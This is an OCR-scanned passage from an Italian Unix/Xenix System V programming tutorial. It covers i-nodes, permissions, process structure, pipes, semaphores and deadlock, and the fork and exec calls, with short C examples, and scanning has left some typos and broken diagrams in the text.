lettura. 

31 EMLINK- Too many links 

Il massimo di link per un file e' di 1 000. 

Se si cerca di superare questo limite si ha questa segnalazione d'errore. 

32 EPIPE - Broken pipe 

Si ottiene scrivendo su una pipe per cui non esiste un processo di lettura. 

33 EDOM - Argument too large 

Una funzione matematica ha ricevuto un argomento troppo grande. 

34 ERANGE - Resulttoo large 

La macchina non può' rappresentare una valore troppo grande restituito da una funzione 
matematica. 

In base a questi codici d'errore e' possibile creare una funzione che esegua il controllo e 
prenda le necessarie decisioni sulla sorte del programma. 

Concetti Generali 

Dovendo programmare sotto sistema operativo Unix una delle maggiori difficolta' e' 
costituita dal fatto di comprendere la metodologia di gestione interna dello Unix stesso. 
Vedremo in questo capitolo di trattare i principi fondamentali legati alla gestione del file 
system e dei processi. 

Per fare questo si pretende già una discreta conoscenza, almeno dal punto di vista utente, 
dello Unix e del linguaggio C. 

Con il termine "file system' si intende la struttura completa di direttori comprensivi di un 
direttorio radice e di tutti gli altri facenti parte dell'albero gerarchico. 

In pratica Unix può' disporre di più' file system che sono da concepire come una 
suddivisione in dischi logici. 

E' possibile caricare più' file system avendo solo l'accortezza di renderli noti al kernel 

mediante I' operazione di mounting. 

Le parti fondamentali di un file system sono : 
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boot block 

Si tratta del blocco zero dove si trova il programma di boot-strap. 



Il primo blocco del file system con le informazioni più' importanti relative a quest' ultimo 
quali le dimensioni, il nome del file system stesso, la data dell'ultima modifica, la data 
dell'ultima operazione di backup, la lista dei blocchi liberi e la lista degli i-node liberi. 



Esiste un i-nodo per ogni direttorio e per ogni file del file system. 

L' i-nodo contiene una descrizione del file o del direttorio a cui si riferisce. 

Tra le informazioni mantenute dall' i-node troviamo i permessi sui files e il numero di link del 

file stesso. 

La metodologia utilizzata per riferirsi ai blocchi dati contenenti le informazioni del file e' 
alquanto particolare. 

Un i-nodo può' puntare direttamente a dieci blocchi dati. 

Questo significa che i dati indirizzati direttamente possono essere, supponendo settori da 
512 bytes, 5120 bytes. 

Se il file supera queste dimensioni I' undicesimo blocco contiene l'indirizzo di un ulteriore 
blocco contenente altri 128 puntatori. 

Normalmente si utilizza, per descrivere questo, il termine 'blocco indiretto'. 

Tenendo in considerazione i 10 blocchi precedenti possiamo dire che con questo metodo 

possiamo indirizzare circa 70.656 bytes ovvero 

512*(10 + 128) 

Se le necessita sono ancora superiori allora il dodicesimo puntatore indirizza a un 
blocco che contiene 128 puntatori a blocchi indiretti. 
Questo significa che lo spazio indirizzabile e' di 

512*(10+128+128 A 2) 

e cioè' circa 8.459.264 bytes. 

Dato che il dodicesimo blocco punta a 128 blocchi indiretti viene definito 'blocco 
d'indirizzamento indiretto a due livelli'. 

Se le dimensioni del file devono essere ancora maggiori avremo che il tredicesimo blocco 
punta a un blocco di 1 28 puntatori che a sua volta puntano a blocchi di 1 28 puntatori. 
Il calcolo dello spazio massimo del file e' dato da 

512*(10+128+128 A 2+128 A 3) 



ovvero 1 .082.201 .088 bytes. 

A seconda della versione dello Unix utilizzato le strutture degli i-nodi possono mutare. 

Unix, all'interno di un file system, tratta tre tipi fondamentali di files: i files normali o ordinari, 

le directory, ed i files speciali. 

I primi sono da considerarsi delle sequenze di bytes organizzati in un array lineare. 

Questo tipo di files sono identificati esclusivamente da un i-number da considerarsi 

come un numero d'indice contenuto all'interno di un array di i-node. 

Bisogna prestare attenzione al fatto che I' i-node non contiene il nome del file ma 

esclusivamente i dati che abbiamo appena visto. 

Chiaramente questo e' abbastanza critico in quanto rifersi ad un file soltanto mediante il suo 
i-number risulta essere complicato. 

Le directory permettono di rifersi ad un file mediante il suo nome. 

In pratica una directory e' composta da una tabella di due colonne. 

Nella prima colonna viene mantenuto il nome del file mentre nella seconda il suo i-number 

corrispondente. 
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La ricerca di un path tipo 'ITLNK/SOURCE/COMX' pretende da parte del kernel le seguenti 
operazioni : 

1) ricerca dell' i-node relativo alla directory corrente per localizzare i byte delle due 
colonne contenenti i nomi e gli i-node dei files in essa contenuti. 

2) ricerca nella colonna dei nomi di 'ITLNK'. Se trovato si ricava l' i-number e l'i-node dei 
byte di dati relativi a questa directory (ITLNK). 

3) ricerca nella colonna del nome della directory 'SOURCE' per localizzare i byte dei dati 
relativi alle due colonne della directory. 

4) ricerca di XOMX' all'interno della tabella dei nomi. 



Sotto sistema operativo Unix, come anche nel OS Ms Dos, esistono due metodi per 
specificare un path. 

Il primo, quello definito assoluto, utilizza il simbolo V per indicare che il path e' specificato 
a partire dalla root o radice. 

Il kernel, a meno di modifiche con chiamate di sistema, riserva l' i-number 2 per la root. 
La ricerca del kernel in questo caso parte dai byte di dati della directory 7' puntati dall' i-node 
della root. 

Il secondo metodo di specifica del path e' quello definito come relativo ovvero a partire dalla 
directory corrente. 

Il kernel mantiene sempre traccia per ogni processo della directory corrente. 
Un processo come cambia directory e' sempre tenuto a notificare il path della nuova 
directory. 

Questo path porta a trovare un i-number che viene utilizzato come i-number della directory 
corrente. 

La struttura utilizzata da Xenix SysV per gli i-node e' la seguente: 

struct Inode { 
char i_flag; 

cnt_t i_count; /* reference count */ 

dev_t i_dev; /* device where inode resides */ 

ino_t i_number; /* i number, 1-to-l with device address */ 

ushort i_mode; 

short i_nlink; /* directory entries */ 

ushort i_uid; /* owner */ 

ushort i_gid; /* group of owner */ 

off_t i_size; /* size of file */ 

union { /* file type dependent section */ 

struct { /* files which have data blocks */ 

union { 

daddr_t i_a [NADDR ] ; /* if normal file/directory */ 

short i_f[ NSADDR ] ; /* if fifio's */ 
} i-P; 

daddr_t i_l; /* last logicai block read */ 

} i_blks; 

struct { /* name type files */ 

long i_type; 
union { 

struct iisem i_sem; 

struct iisd i_sd; 

struct iirem i_rem; /* DSA */ 

} i_ndata; 

} i_namef; 
} i_fdep; 

struct locklist *i_locklist; /* locked region list*/ 



Per le definizioni non documentate nella precedente struttura guardate 
/usr/include/sys/inode.h. 

I files definiti speciali sono in pratica o un qualche tipo di periferica o un buffer FI FO. 
I files speciali possono essere essenzialmente di due tipi : a blocchi e a caratteri. 
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I pratica un files speciale a caratteri per eseguire I' I/O esegue operazioni di lettura e 
scrittura su questo trattando un carattere per volta. 

Nel caso di files a blocchi significa che la periferica associata dispone di un array di blocchi 
e quindi I' I/O avviene usando pezzi di dimensioni maggiori come, ad esempio, nel caso in 
cui si richieda la lettura di un settore di un disco. 

Un ulteriore argomento su cui conviene dire due parole e' quello legato ai permessi abbinati 
ad ogni file sotto sistema operativo Unix. 

Quando si esegue il login Unix ricerca il nominativo specificato dall'utente nel file 
/etc/passwd. 

Se il nominativo e la password utilizzate sono giuste all' utente viene permesso l'accesso al 
sistema e a questo gli viene assegnato un numero intero associato a questa entry nel 
file della password. 

Questo numero viene definito come user-ID (identificatore utente). 

Sotto sistema operativo Unix esiste un ulteriore raggruppamento fatto con gli utenti. 

In pratica nel file /etc/group e' possibile formare dei gruppi e quindi e' possibile abbinare 

uno specifico utente ad uno di questi. 

L'utente quindi non e' solo identificato da uno user-ID ma anche da un group-ID. 

Vedremo in seguito che questa definizione non e' completa in quanto uno user possiede 

un real-user-ID, un real-group-ID, un effective-user-ID ed un effective-group-ID. 

Ogni file di Unix possiede nel suo i-node un owner user-ID che identifica il proprietario del 

file e un owner group-ID che ne identifica il gruppo. 

Oltre a questo esistono nell'i-node tre gruppi di tre bit che specificano i permessi al file 
per quanto riguarda il proprietario, il gruppo e il pubblico. 

Usando il comando 1s' per mostrare il contenuto della directory vi viene mostrato a fianco i 
nomi dei files una stringa di 1 0 caratteri del tipo : 

drwxr-xr-x 

II primo carattere a sinistra specifica il tipo di file. 

Gli altri nove sono in pratica i bit di cui ho appena parlato. 

I primi tre a sinistra indicano i diritti del proprietario del file (nell'esempio rwx ovvero diritti di 
lettura, scrittura e di esecuzione). 

I tre di mezzo sono i diritti del gruppo a cui appartiene il proprietario del file (r-x starebbe 
per lettura ed esecuzione). 

Gli ultimi tre bit a sinistra sono i diritti per il pubblico (anche in questo caso lettura ed 
esecuzione). 

La rappresentazione binaria dei bit sarebbe : 



Questi bit sono ignorati nel caso che la user-ID sia 0 e precisamente quella del 
superuser. 



Programmi e processi. 

Un concetto chiave in un sistema operativo come Unix e' quello legato al termine di 
TROCESSO. 

Generalizzando potremmo definire il processo come un programma in esecuzione anche se 
vedremo che tra processo e programma esiste una sottile differenza. 
In questa parte del fascicolo vedremo di definire ambedue. 

Un programma eseguibile sotto sistema operativo Unix può' essere considerato come una 

byte stream ovvero come una fila sequenziale di bytes salvati su disco. 

Esiste un ulteriore suddivisione logica che potremmo fare con un file eseguibile. 

Diciamo che un file di questo tipo, su disco, può' essere concepito come un insieme di 

quattro parti fondametali. 

Queste parti sono I' header, il text segment, il data segment e la symbol table. 
L' header contiene informazioni relative al caricamento e all'esecuzione del programma. 
Come nel caso dell' header dei file eseguibili sotto OS Ms Dos uno dei campi e' relativo al 
puntatore alla stack area che il programma utilizzerà' per le allocazioni delle variabili locali, 
per il passaggio di valori tra funzioni e per altri scopi simili. 
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Il text segment e di fatto il segmento protetto in scrittura del codice eseguibile ovvero delle 
istruzioni in linguaggio macchina che permettono l'esecuzione del programma. 

I dati definiti come statici vengono allocati all'interno del data segment (definizioni in C 
tipo static ed extern vengono allocate in questo segmento). 

La symbol table invece contiene tutti i riferimenti ai simboli utilizzati dal programma. 
Un ulteriore sezione del file eseguibile potrebbe essere inclusa per uso del debugger. 
Questa viene definita come 'debug table' e contiene appunto informazioni ad uso del 
debugger stesso. 

Al momento della chiamata exec() il file eseguibile cambia ed e' tradotto, al momento 
dell'allocazione in memoria, in un immagine di processo. 

L'immagine del processo può' essere suddivisa in più' regioni. Queste sono la regione del 
codice , quella dei dati e quella dello stack. 

Quando un processo entra in esecuzione non e' solo più' composto dalle regioni del 
programma utente ma anche di quelle legate al kernel che deve seguire il processo. 
In pratica il kernel utilizza lo stesso numero di regioni per mantenerci la parte del sistema 
operativo che deve seguire il processo. 

Queste sono in pratica della stessa natura di quelle viste precedentemente ovvero esiste 
una regione codice, una dati e una stack anche dalla parte del kernel. 
Le regioni dello user e del kernel vivono affiancate ma di fatto le routine user non possono 
toccare direttamente le regioni di quest' ultimo. 

Per fare in modo che la regione utente possa richiedere l'appoggio del sistema 
operativo esistono le system calls che sono un po da considerarsi come i punti di 
comunicazione tra la parte user e quella kernel. 
Vedremo nel prossimo capitolo le system calls di Unix. 

Esiste una breve divagazione da fare per quanto riguarda l'utilizzo della memoria da 
parte di Unix. 

Abbiamo detto che la parte user può' essere suddivisa in tre regioni. 
Ogni regione contiene un parte utilizzata e una non utilizzata. 

In particolare la data area e' suddivisa in una parte inizializzata e in una non 
inizializzata definita come 'bss'. 

Ogni volta che viene richiamata una funzione exec() all'interno di una parte della data 
area del kernel viene aggiunto un ingresso per la nuova immagine del processo in quella 
che e' chiamata process table. 

Vedremo successivamente la struttura della tavola dei processi. 

Quest'ingresso nella tavola dei processi indica un nuovo indirizzo nella user area. 

La user area a sua volta contiene altre importanti informazioni relative ai processi, inclusele 

dimensioni e le locazioni delle 

varie regioni. 

Le dimensioni di un processo sono riferite in clicks dove un click e' la più' piccola unita' di 
memoria che può' essere allocata. 

Parlando di memoria usata da un processo ci riferiamo a questa parlando di pagine 

utilizzate dove la pagina e' la più' piccola unita' di memoria richiesta perche' sia possibile la 

protezione della stessa. 

Una pagina e' sempre un multiplo di un click. 

Parlavamo prima di protezione della regione del codice. 

II text segment, sotto Unix Sys V, e' di default protetto. 

La protezione del segmento codice permette ad alcuni processi di eseguire una condivisione 
della memoria del text segment. 

Prendete ad esempio un sistema Unix in cui più' utenti utilizzano contemporaneamente I' 
editor di Unix VI. 

Sarebbe un inutile sciupio di spazio caricare più' file eseguibili in memoria. 

Quando il codice non e' protetto in scrittura allora e' incluso nell' area dati. 

Una memoria non protetta viene utilizzata nel momento in cui si desidera un avere, per 

un qualsiasi motivo, un codice automodificante. 

Per suddividere i due tipi di codice, quello a scrittura protetta e quello a scrittura libera, Unix 
assegna al codice un numero che viene definito 'numero magico' (magic number). 
Questo nel caso di un file eseguibile con text segment protetto vale 410. 
La memoria in questo caso potrebbe essere schematizzata come segue. 
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— + 


-+ 


Code 




. 




+ 


-+ 




; Non usata 






—+ 


-+ 




— + 


-+ 


Data 








; Inizializzata 


; 




+ 


- + 




; bss 






—+ 


- + 




+ 


— + 


sp 








; Non usata 






—+ 


- + 


Stack 






Nel caso che si abbia un tipo 407, non protetto in scrittura, avremo : 
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; Inizializzata 
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- + 




; bss 






—+ 


- + 
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- + 


sp 








; Non usata 






—+ 


- + 


Stack 








— + 


- + 



Diamo un occhiata più' a fondo il discorso relativo alla tavola dei processi. 

Mediante opportune soluzioni software e' possibile fare in modo che un normale sistema 

possa eseguire più' operazione nello stesso tempo. 

Esprimere il concetto in questo modo potrebbe far pensare che di fatto vari programmi 
potrebbero essere in esecuzione in un preciso istante. 

Questo non può' essere vero in un sistema dotato di una singola CPU in quanto questa di 
fatto non potrebbe svolgere più' di un istruzione per volta. 

In pratica la CPU continua ad eseguire lo switch tra i vari processi attivi mediante un 
determinato algoritmo di scheduler che stabilisce, in base ad alcuni parametri, quando 
interrompere un processo attivo per attivarne un altro. 

Il concetto viene espresso dal termine 'pseudoparallelismo' in quanto benché' la 
sensazione possa essere quella che più' programmi girino contemporaneamente di fatto 
la CPU segue un solo processo per volta. 

Come dicevamo prima un processo e' un programma in esecuzione dotato di una parte 
eseguibile, di una sua zona dati e di uno stack, di un program counter, di un certo numero di 
registri e in generale di tutte le informazioni necessarie per l'esecuzione. 
In altre parole risulta chiaro il fatto che se un processo termina la sua esecuzione 
momentaneamente, a causa di uno switch eseguito dallo scheduler, dovrà' conservare un 
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certo numero di informazioni perche' sia possibile la ripresa delle sue funzioni al momento 
della riattivazione. 

Questi dati vengono conservati in quella che viene chiamata, come abbiamo già' visto, 
'process table'. 

Tra i campi della struttura relativa alla process table troviamo ad esempio i registri, il 
program counter, lo stato del 

programma, il puntatore allo stack, lo stato del processo, il tempo in cui il processo e' 
partito, il tempo CPU utilizzato, il tempo CPU utilizzato dai processi 'figli', il tempo del 
prossimo allarme, un puntatore al buffer messaggi per la comunicazione tra i processi, il 
process-ID, il puntatore al segmento istruzioni, 

il puntatore al segmento dati dell' utente, il puntatore al segmento dati del sistema, il 
parent-process-ID, il process-group-ID, lo user-ID, lo user-group-ID, il puntatore alla root, il 
puntatore alla directory di lavoro e i descrittori dei file utilizzati dal processo stesso. 
Un processo può' fare richiesta al kernel di creare altri processi, che verrebbero gestiti 
in modo concorrente, diventando cosi il padre di questi. 

Tra i dati di sistema mantenuti per ogni processo troviamo tre numeri positivi interi ed 
esattamente : 

process-ID, parent-process-ID e process-group-id 

Ogni processo creato dal kernel viene identificato da un numero intero positivo normalmente 

indicato con il termine 'process ID' (il PID di INIT e' 1). 

Il parent-process-ID identifica il processo da cui discende il processo corrente. 

In altre parole il process-ID di un processo viene assegnato al parent-process-ID del suo 

processo 'figlio'. 

Se per un qualsiasi motivo un processo termina la sua esecuzione tutti i processi che 

derivano da questo assumono come parent-process-ID il numero 1 che come 

abbiamo già' detto corrisponde al process-ID di 'INIT. 

Spesso, invece di creare un solo processo, si preferisce crearne un gruppo. 

Il kernel permette di mantenerli correlati mediante il process-group-ID. 

In ogni gruppo esiste sempre un capo gruppo che assegna il proprio process-ID ai 

process-group-ID degli altri. 

E' anche possibile che un determinato processo si assegni come process-group-ID il 
proprio process-ID. 

Facendo in questo modo il processo abbandona il gruppo degli altri processi e si mette 
in grado di crearne di nuovi. 

Prima di terminare il discorso relativo ai processi specifichiamo cin una sola frase la 
differenza tra processo e programma. 

Un processo e' l'esecuzione di un ambiente comprensivo di istruzioni, regioni utente e 
regioni di sistema (definite anche come segmenti). 

Un programma e' invece un file contenente istruzioni e dati che vengono utilizzati per 

inizializzare i segmenti del codice e dei dati utente di un processo. 

Spesso e' sentita la necessita' di fare comunicare tra loro diversi processi. 

Per questo compito ci sono varie possibilità' anche se di fatto non ne esiste una sola che 

possa essere efficace per tutti casi. 

In molte versioni precedenti al System V i processi poteveno comunicare tra loro solo 
mediante un condivisione dei puntatori ai file. 

In pratica un determinato file veniva utilizzato per contenere i dati di passaggio da un 
processo all' altro. 

La condivisione dei puntatori ai file poteve essere solo eseguita nel caso di processi 
relazionati tra di loro. 

Quando due processi non sono concorrenti tra loro si potrebbero usare dei files per 
comunicare dati tra un processo e l'altro. 

Bisogna sottolineare che la tecnica dei file non funziona per processi in concorrenza in 
quanto si potrebbe verificare il caso in cui il processo che deve ricevere i dati oltrepassi 
come esecuzione quello che deve fornirli. 

Un altro metodo utilizzato per la comunicazione tra processi e' quello offerto dalle 'pipe'. 
Una pipe e' una specie di pseudo-file in cui il processo in lettura, nell'eventualità' che 
questo trovi il file vuoto, attende fino a quando il processo che deve scrivere ha terminato 
la sua funzione. 
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Si potrebbe verificare anche la situazione inversa e cioè' quella in cui il processo che 

scrive nella pipe avanzi troppo rapidamente rispetto al processo che legge. 

In questa situazione il processo scrivente dovrebbe essere sospeso momentaneamente. 

In altre parole quando un processo prova a leggere o a scrivere in una pipe il sistema 

operativo testa immediatamente lo stato di questa per vedere se l'operazione può' essere 

eseguita. 

In caso negativo lo Unix salva nella tavola dei processi la system cali fino a che non può' 
essere ripresa. 

Come vedremo l'utilizzo delle pipe e' supportata mediante una chiamata di sistema. 
Prima di terminare il discorso legato a queste brevi note su argomenti chiave del sistema 
operativo Unix vediamo l'ultimo concetto importante, sia dal punto di vista della 
prenotazione delle risorse che da quello dei lock ai file che vedremo, ovvero quello legato al 
termine di 'semaforo'. 

Parlando di processi concorrenti bisogna valutare alcune condizioni che potrebbero 
verificarsi durante lo switching eseguito dallo scheduler. 

Supponiamo che un determinato processo venga interrotto dalla routine di 
disattivazione processi chiamata dallo scheduler nell'istante in cui stava utilizzando una 
risorsa quale ad esempio un nastro o una stampante. 

In questo caso il processo verrebbe interrotto e quindi i dati legati a questo verrebbero 
salvati nella process table di quest'ultimo. 

Chiaramente il nuovo processo non dovrebbe accedere alla risorsa in quanto utilizzata dal 
processo precedente. 

Per andare incontro a questo problema lo Unix System V ha implementato l'uso dei 
'semafori'. 

Il semaforo e' in pratica un indicatore che impedisce a due o più' processi di accedere alla 
stessa risorsa. 

Esiste uno stretto legame tra il semaforo informatico e quello stradale. 

Il semaforo stradale mi segnala con il rosso che un determinato incrocio e' occupato dal 

flusso di autovetture che vengono da una certa direzione. 

La segnalazione eseguita dal semaforo non mi può' pero' obbligare a rispettarla. 
Potrei non vederla oppure ignorarla. 

Potrei, passando con il rosso, andare incontro a un incidente o magari a una multa. 

Anche nel caso del semaforo informatico il programma potrebbe non testarlo oppure, magari 

a causa di errori di programmazione, ignorarlo. 

Il semaforo per se stesso mi segnala un evento ma non mi impedisce di cercare di 
accedere ugualmente alla risorsa. 

In pratica un processo, prima di cercare di utilizzare una risorsa, dovrebbe controllare se 
questa non e' già' prenotata da qualche altro processo. 

Con il termine "risorsa" non si intende solo ed esclusivamente un dispositivo hardware ma 

anche una variabile o una zona di memoria. 

Il concetto di semaforo fu introdotto da Dijkstra nel 1965. 

Secondo il concetto teorico puro un semaforo e' un numero intero positivo sul quale 
possono agire solo funzioni per il suo incremento e per il suo decremento, a parte un 
assegnazione. 

Le operazioni di incremento (sem = sem + 1) e di decremento (sem = sem - 1) sono 
considerate operazioni indivisibili al fine di evitare che più' processi valutino in modo 
errato il valore di sem. 

Supponiamo che due processi vogliano eseguire l'incremento con sem uguale a 2. 
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Se ci fosse la possibilità di suddividere la fase di incremento, o di decremento, si potrebbe 
verificare che mentre un processo valuta l'espressione sem + 1 , o sem - 1 , anche un altro 
processo valuti sem + 1 . 

Chiaramente il secondo eseguirebbe la valutazione quando il primo non aveva ancora 
eseguito l'assegnazione sem = 3 e quindi valuterebbe s con un valore 2. 
Successivamente sia il primo processo che il secondo assegnerebbero a sem il 
valore di 3. 

Uno dei due incrementi andrebbe quindi perso. 

Dijkstra indicava le funzioni d'incremento e di decremento con le iniziali delle parole 
olandesi, P e V, anche se oggi vengono spesso rappresentate con i nomi signal() e wait(). 
In pratica lo scopo delle due funzioni, teoricamente, dovrebbero eseguire quanto segue : 



wait (sem) o P (sem) 



quando s > 0 decrementa sem 



Nei casi precedenti parlavamo di assegnare al semaforo una valore di 2 il che significava che 

ci sarebbero voluti più' operazioni 

di decremento per acquisire il semaforo. 

Informaticamente parlando potremmo dire che più processi potrebbero accedere 
ontemporaneamente alla risorsa (un numero prestabilito). 

Nelle librerie dello Xenix a partire dalla Versione 3.0 sono presenti alcune funzioni adatte 

alla creazione e al controllo dei 

semafori che vedremo parlando del linguaggio C. 

Parlando di processi concorrenti bisogna prestare attenzione a determinate situazioni 
legate all'uso dei semafori che potrebbero portare a situazioni di stallo ovvero quelle in cui 
più' processi si ritrovano a competere per l'accesso a una risorsa. 

Immaginate la seguente situazione in cui due processi richiedono la prenotazione di due 
semafori. 

Processo A Processo B 



P(x) 
P(y) 



P(y) 

P(x) 



Supponendo che si X che Y valgano 1 ci si troverebbe nella situazione in cui ne il 
primo processo ne il secondo riuscirebbero a proseguire oltre la seconda operazione di 
PO- 

In altre parole il processo A prenoterebbe il semaforo x e il processo B quello y. 
Successivamente, alla seconda operazione di P(), il processo A, trovando occupato il 
semaforo y, rimarrebbe in attesa della sua liberazione. 

Il processo B, quello che dovrebbe rilasciare il semforo y, starebbe invece in attesa del 
rilascio del semaforo x. 

Il termine utilizzato per rappresentare questa situazione e' 'deadlock'. 

Vedremo l'implementazione dei semafori sotto Unix SysV in alcuni esempi riportati nella 

sezione relativa alla comunicazione dei processi. 



Chiamate si sistema. 

Fino ad ora abbiamo visto solo alcuni concetti teorici legati alla metodologia utilizzata da 
Unix per gestire files e processi. 

Da qui in avanti iniziamo a vedere le problematiche e il metodo di risolverle mediante 
programmi in C che sfruttando le librerie 
di Xenix Vers. 3.0 oppure Xenix System V. 

Le chiamate di sistema sono, sia come numero che come scopo, diverse. 
Occorre trovare una metodologia per eseguire la discussione relativa a queste. 
Dicevamo che le chiamate di sistema hanno diversi scopi quali, ad esempio, la gestione dei 
files, il controllo dei processi, la manutenzio dei permessi e la gestione dell' I/O con un 
terminale. 

Prenderemo questi per eseguire dei raggruppamenti funzionali. 
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Iniziamo a vedere alcune caratterstiche comuni di tutti i programmi indipendentemente 
dallo scopo di questi. 

Quando un programma viene eseguito riceve due tipi di dati e precisamente gli argomenti 
e l'enviroment. 

L'enviroment viene settato mediante comandi di shell. 
Ad esempio il comando di shell 

PATH = /usr/bin:/bin:/usr/flavio 

In pratica il comando crea uno spazio in memoria per la stringa e gli associa un puntatore 
(difatto la procedura eseguita dalla shell e' un po più' complicata di come descritto) . 
Da un programma Unix e' possibile puntare all'enviroment in due diversi modi. 
Il primo e' quello di accedere mediante il puntatore 'environ'. 
Ad esempio : 

extern char ** environ; 

main (argc, argv) 
int argc; 
char *argv[ ] ; 
{ 

int index = 0; 
while (environ [index ] ) 

printf ( "%s \n ", environ [index++ ] ) ; 



stampa l'intero enviroment. 

Il secondo metodo e' quello di accedere mediante envp dalla funzione main. 



main(argc,argv,envp) 
int argc; 

char *argv[], *envp[]; 



In ambedue i casi l'enviroment e' una lista di array di puntatori a caratteri che contengono le 
linee dell'enviroment meno l'ultimo elemento che punta a NULL. 
I puntatori all'enviroment puntano a stringhe della forma 

variabile=valore 



terminanti con '\0' (dopo il valore). 

L'array di puntatori non dispone di un ordine particolare che ci permetta di sapere il valore di 
una certa variabile senza che si debba eseguire una scansione e un' analisi delle 
stringhe trovate. 

Nel caso in cui da un certo programma fossimo interessati a conoscere l'argomento di 
una certa variabile potremmo utilizzare la funzione getenv() presente nelle librerie di Xenix. 
Vediamone la sintassi e l'uso. 

char *getenv(name) 
char *name; 



Supponiamo di avere l'enviroment che punta alla seguente lista di stringhe : 



HOME=/usr/flavio 
PATH=/bin;/usr/bin;/usr/flavio 



Per avere dal nostro programma il valore della variabile PATH potremmo eseguire le 
seguenti istruzioni : 

char *path; 
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±f(!(path = getenv("PATH") ) ) { 

fprintf (stderr, "Non trovato * PATH ' !"); 
return (-1) ; 

ì 

prlntf( " \n%s ", path) ; 



Il risultato sarebbe la stampa di 
/bin:/usr/bin:/usr/flavio 



Fino ad ora si e' parlato del concetto generale di processo senza accennare a nessuna delle 
funzioni mediante le quali e' possibile crearne di nuovi. 

Per eseguire un programma sotto Ms Dos abbiamo un numero maggiore, rispetto a 
Unix, di funzioni come ad esempio la exec e la spawnl. 

La differenza che passa tra le due e semplicemente legata al fatto che la exec dopo aver 
lanciato il programma specificato non ritorna al programma chiamante mentre la spawn 
sospende il 

processo chiamante fino al ritorno dal nuovo processo. 

Partendo dal presupposto che sotto Unix non esiste la funzione spawn possiamo 

ugualmente utilizzare le due funzioni per introdurre il discorso della exec sotto OS Unix. 

In pratica la funzione exec non crea nessun nuovo processo ma si accontenta di ricopiare il 

programma da mandare in esecuzione su quello chiamante. 

Per questo motivo non e' possibile ritornare da una chiamata ad exec. 

La funzione spawn invece crea un nuovo processo e ricopia il programma nei nuovi 

segmenti. 

Dicevo prima che sotto OS Unix non esiste la funzione spawn ma in 

ogni caso esistono una serie di chiamate di sistema che opportunamente usate 
possono eseguire la stessa cosa. 

Nella prima parte di questo fascicolo abbiamo parlato della differenza tra programma e 
processo. 

In pratica avevamo detto che un programma era da considerarsi come un array su file 
contenente tutti dati di inizializzazione, il codice e i dati veri e propri. 

Il processo in pratica era costituito da un segmento di codice, da uno di dati e da uno di 
stack che vengono inizializzati dal programma. 

La funzione exec non fa altro se non eseguire questa inizializzazione. 
La funzione exec quando lancia un programma non crea un nuovo processo ma ricopia 
nei segmenti del processo corrente i dati (codice, dati ecc.) presi dal programma stesso. 
Sotto sistema operativo Unix ci troviamo di fronte a due funzioni delle quali e' necessario 
capirne il funzionamento. 

Si tratta della funzione exec, con le sue sei derivazioni, e della funzione fork. 
Vediamo la prima. 

int execl(path,arg0,arg1 ,...,argn,(char *)NULL) 



In pratica il path specifica il nome del programma, con l'eventuale percorso, che deve 
essere seguito. 

Arg1 , arg2 ecc, sono stringhe contenenti i vari argomenti. 

Il NULL finale sta ad indicare che gli argomenti sono terminati. 

La funzione exec non restituisce nessun valore se non una segnalazione d'errore nel 
caso che il programma specificato nel path non sia eseguibile. 
Ad esempio : 

int funz() 
{ 

int r_code = 0; 

execl("/bin/sz", "my_prg", (char *)NULL) ; 
perror ( "Send") ; 
r_code = -1; 
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/* qui ci arriverà ' solo se la funzione exec non */ 
/* ha avuto successo . */ 
return (r_code) ; 

} 

Questo significa che sotto Unix non e' possibile eseguire da un programma un altro 

programma senza che il primo venga inesorabilmente interrotto ? 

No. 

Parlavo prima di due funzioni. 

Una, come abbiamo visto, era la funzione exec(). 

La seconda e' costituita dalla funzione fork(). 

Lo scopo di questa e' di creare una copia del processo da cui viene richiamata la funzione 
stessa. 

In pratica, nella parte in cui abbiamo parlato del concetto generale di processo, avevamo 
accennato a quello che si intende con il termine 'processo padre' e 'processo figlio'. 
La fork, dicevamo prima, crea una replica del processo ovvero crea quello definito come 
processo figlio. 

La chiamata alla funzione fork() ritorna ad entrambi i processi (quello padre e quello figlio) 
un valore. 

Questo punto e' fondamentale in quanto la fork() creando il nuovo processo mantiene delle 
copie quasi esatte delle istruzioni, dei dati utente e di quelli di sistema del vecchio processo. 
In pratica al processo figlio viene associato un nuovo identificatore di processo ma il 
codice rimane lo stesso del processo padre. 
In altre parole tutti e due i processi eseguono lo stesso codice. 

Se non ci fosse la possibilità' di esaminare il valore di ritorno della fork() e di differenziare 
l'esecuzione del codice in base a questo non ci sarebbe neppure l'utilità' di eseguire un 
duplicato del processo. 

La fork() restituisce il valore 0 al processo figlio e un valore non zero al processo padre. 
Il valore restituito al padre corrisponde all' identificatore del figlio. 
Un esempio semplice di uso della fork() potrebbe essere : 

int funz() 
{ 

if(fork()) { 

printf ("\nQuesto codice viene eseguito dal processo 

padre . ") ; 

printf ("\nPID = %d, PPID = %d", getpid(), getppid() ) ; 
} else { 

printf ("\nQuesto codice viene eseguito dal 
processo figlio . ") ; 

printf ("\nPID = %d, PPID = %d", getpidf), getppidf)); 

} 

} 

Le funzioni getpid() e getppid() restituscono, rispettivamente, l'identificatore del processo e 
l'identificatore del parent proces. 

Ad esempio sotto Xenix 386 e' possibile lanciare da una console virtuale CU (il programma 
di comunicazione di Unix). 

Passando ad un'altra console e lanciando il comando PS, che visualizza i dati relativi ai 
processi attivi, si può' notare come esistano due processi attivi dedicati a CU. 
In pratica CU ha dupplicato il processo e in base al codice restituito dalla fork() ha 
attivato un codice che si interessa della trasmissione in uno e quello dedicato alla 
ricezione nell'altro. 

Prendiamo ad esempio la fork utilizzata con una funzione exec. 

Dicevamo prima che la fork() dupplica il processo senza inizializzarlo ovvero 
esattamente il contrario di ciò che fa la exec() e cioè' che inizializza il programma senza 
creare un nuovo processo. 

Mediante l'uso della fork e' possibile creare un nuovo processo e fare in modo che sia questo 
ad eseguire una chiamata ad exec(). 
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Avevamo anche detto che dopo una chiamata ad exec(), andata a buon fine, non si 
sarebbe pututo riprendere il programma in quanto i dati del programma chiamato 
avrebbe ricoperto il 
programma corrente. 

Nel caso che la chiamata venga eseguita dal processo figlio il padre potrebbe riprendere 
le sue funzioni non appena fosse terminato il primo. 
Ad esempio si sarebbe potuto scrivere : 

lf(!fork()) { 

execl ("/bin/sz", "my_prg" , (char *) NULL) ; 

perror ( "Exec ") ; 

exit (1) ; 
} else { 

/* Attendi che sia terminato il processo figlio */ 



I codici riportati fin qui sono in parte incompleti in quanto vengono esaminati in questi 
solo i valori restituiti da fork() pari a zero o maggiori di zero. 

La fork() restituisce -1 nel caso in cui si sia verificato un errore. 

Gli errori che possono capitare con una fork() sono essenzialmente due. 

